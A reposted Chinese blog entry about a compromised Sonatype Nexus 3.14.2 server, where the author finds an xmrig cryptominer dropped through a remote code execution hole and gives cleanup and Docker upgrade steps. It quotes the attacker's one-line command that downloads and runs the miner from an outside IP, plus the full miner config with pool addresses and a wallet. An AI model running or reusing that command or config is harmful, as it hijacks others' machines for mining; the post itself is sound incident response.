码迷,mamicode.com
首页 > 其他好文 > 详细

Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞

时间:2019-03-15 13:12:04      阅读:223      评论:0      收藏:0      [点我收藏+]

标签:ini   ict   新版   cal   代码执行   http   mode   14.   sys   

发现被执行的程序在xmrig在 /var/tmp/目录下 

curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /var/tmp/config.json http://202.144.193.159/22.json;chmod 777 /var/tmp/xmrig;cd /var/tmp;setsid ./xmrig -c config.json &

 

config.json内容如下:

{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 5,
    "donate-level": 1,
    "huge-pages": true,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 95,
    "pools": [
        {
            "url": "202.144.193.8:80",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "185.161.70.34:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "202.144.193.110:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        },
        {
            "url": "205.185.122.99:3333",
            "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }       
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": {
        "cn": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ],
        "cn-lite": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ],
        "cn-heavy": [
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            },
            {
                "low_power_mode": 1,
                "affine_to_cpu": false,
                "asm": true
            }
        ]
    },
    "algo-perf": {
        "cn": 2.0,
        "cn/2": 2.0,
        "cn/msr": 2.0,
        "cn-lite": 2.0,
        "cn-heavy": 2.0
    },
    "calibrate-algo": false,
    "calibrate-algo-time": 10,
    "user-agent": null,
    "syslog": false,
    "watch": false
}

还有一个可 执行的程序 

xrmrig,此程序会 导致cpu爆满 

删除/var/tmp/目录下的文件,然后把 程序升级  ,用docker安装的升级如下:

docker pull docker.io/sonatype/nexus3 //会自动拉去最新版本  
docker run -d -p 8081:8081 -p 5000:5000 --name nexus3 -v /root/nexus-data/:/nexus-data/ --restart=always sonatype/nexus3

 

Sonatype Nexus Repository Manager版本3.14.2访问控制缺失及远程代码执行漏洞

标签:ini   ict   新版   cal   代码执行   http   mode   14.   sys   

原文地址:https://www.cnblogs.com/linyouyi/p/10536342.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!